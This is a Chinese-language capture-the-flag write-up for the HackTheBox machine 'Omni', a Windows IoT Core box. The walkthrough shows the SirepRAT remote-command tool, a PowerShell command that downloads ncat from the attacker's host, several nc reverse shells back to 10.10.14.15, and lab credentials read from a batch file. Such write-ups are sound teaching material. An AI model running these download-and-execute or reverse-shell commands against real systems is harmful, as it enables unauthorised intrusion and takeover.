Omni - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/271

• 10.10.10.204

端口扫描

135,8080:

$ nmap -Pn -sC -sV 10.10.10.204

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 14:12 CST
Nmap scan report for 10.10.10.204
Host is up (0.069s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.32 seconds

8080

Windows Device Portal,需要登录：

看起来是个windows IOT，搜索资料：

• Windows 10 IoT Core远程命令执行漏洞验证及建议 - FreeBuf网络安全行业门户
  https://www.freebuf.com/articles/web/199292.html

可以直接使用：

• https://github.com/SafeBreach-Labs/SirepRAT

SirepRAT

download ncat

任意执行命令，例如下载文件:

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.15:7778/ncat.exe" --v

reverse shell

使用nc反弹shell：

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe 10.10.14.15 4444 -e powershell.exe" --v

whoami报错，可以使用$env:UserName

搜集信息

在这个目录发现一个bat文件，这个文件中有两组账号密码：

cd "c:\Program Files\WindowsPowershell\Modules\PackageManagement"
ls -force

r.bat

@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

Windows Device Portal

回到8080的web，可以使用app:mesh5143登录：

reverse shell

Process -> run command:

C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.15 4445 -e powershell.exe

得到app用户shell：

user flag

app用户可以读取user.txt,同样需要通过powershell去读：

$credential = Import-CliXml -Path U:\Users\app\user.txt
$credential.GetNetworkCredential().Password

root flag

前面bat文件里我们得到了两组密码，administrator也是同样流程，登录8080，执行命令，反弹shell，读取root.txt:

administrator _1nt3rn37ofTh1nGz

C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.15 4446 -e powershell.exe

$credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential.GetNetworkCredential().Password

参考资料

• Windows 10 IoT Core远程命令执行漏洞验证及建议 - FreeBuf网络安全行业门户
  https://www.freebuf.com/articles/web/199292.html
• https://github.com/SafeBreach-Labs/SirepRAT
• HACK THE BOX - Omni 10.10.10.204 [Writeup/Walkthrough]
  https://hacktheboxwriteups.blogspot.com/2020/08/omni.html
• Omni - YouTube
  https://www.youtube.com/watch?v=hC4iqMpqt-s